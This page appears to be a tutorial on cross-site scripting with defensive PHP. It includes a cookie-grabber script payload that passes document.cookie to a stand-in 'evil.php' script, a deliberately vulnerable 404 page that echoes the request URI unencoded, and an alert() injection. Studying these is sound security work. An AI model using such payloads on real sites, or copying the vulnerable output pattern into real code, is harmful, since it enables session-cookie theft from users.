"Cookie Grabber", XSS Attack Example
Attack Examples
Example 1: Cookie Grabber
If the application doesn’t validate the input data, the attacker can easily steal a cookie from an authenticated user. All the attacker has to do is place the following code in any posted input (e.g. message boards, private messages, user profiles):
<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>
The above code passes the URL-escaped content of the cookie (the RFC requires content to be escaped before it is sent in an HTTP GET request) to the evil.php script in the “cakemonster” parameter. The attacker then checks the output of their evil.php script (a cookie grabber script will usually write the cookie to a file) and uses the stolen cookie.
Error Page Example
Let’s assume that we have an error page which handles requests for non-existing pages, a classic 404 error page. We may use the code below as an example to inform the user which page is missing:
<html>
<body>
<?php
// Vulnerable: the request URI is decoded and written into the HTML without encoding
print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);
?>
</body>
</html>
Let’s see how it works: http://testsite.test/file_which_not_exist
In response we get: Not found: /file_which_not_exist
Now we will try to force the error page to include our code: http://testsite.test/<script>alert("TEST");</script>
The result is: Not found: / (followed by the injected JavaScript, <script>alert("TEST");</script>, which the browser executes instead of displaying it as text)
We have successfully injected the code: our XSS! What does this mean? For example, that this flaw could be used to try to steal a user’s session cookie.
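As an added example (not code from the original page), the PHP below shows the defensive side of both examples above: the 404 page rewritten so that the request URI is HTML-encoded before it is printed, so an injected <script> tag is rendered as inert text, and the session cookie configured with the HttpOnly flag, so that document.cookie would not expose it even if a script were injected. The function names html_escape, not_found_body, render_not_found and configure_session_cookie are this example's own, and the payload string in the demonstration is constructed from the request shown above.

```php
<?php
// Added example: hardened counterpart of the vulnerable 404 page on this page.
declare(strict_types=1);

// Encode a string for safe inclusion in HTML. ENT_QUOTES also encodes ' and ",
// ENT_SUBSTITUTE returns a replacement character instead of "" on invalid UTF-8.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Build the "Not found" page body from a (possibly attacker-controlled) request URI.
// The vulnerable version printed urldecode($request_uri) straight into the HTML;
// here the decoded value is encoded, so "<script>" becomes "&lt;script&gt;".
function not_found_body(string $request_uri): string
{
    return "<html><body>Not found: " . html_escape(urldecode($request_uri)) . "</body></html>";
}

// Send the hardened 404 response with an explicit status and charset, so the
// browser does not have to guess the encoding of the page.
function render_not_found(string $request_uri): void
{
    http_response_code(404);
    header('Content-Type: text/html; charset=UTF-8');
    echo not_found_body($request_uri);
}

// Configure the session cookie before session_start(); run once at bootstrap.
// HttpOnly keeps the cookie out of document.cookie, which is exactly what the
// cookie grabber above reads.
function configure_session_cookie(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,   // only sent over HTTPS
        'httponly' => true,   // not readable from JavaScript
        'samesite' => 'Lax',  // not sent on most cross-site requests
    ]);
}

// Demonstration on the command line with a constructed input equal to the
// injected request shown above; in a web context render_not_found() would be
// called with $_SERVER["REQUEST_URI"] instead.
if (PHP_SAPI === 'cli') {
    $constructed_request = '/<script>alert("TEST");</script>';
    echo not_found_body($constructed_request), PHP_EOL;
}
```

Running the demonstration prints the page with the tag encoded as entities, so the browser shows the literal text rather than running it. The cookie settings only help if they are applied before the session is started, and HttpOnly addresses cookie theft specifically; output encoding is still required, since an injected script can do more than read cookies.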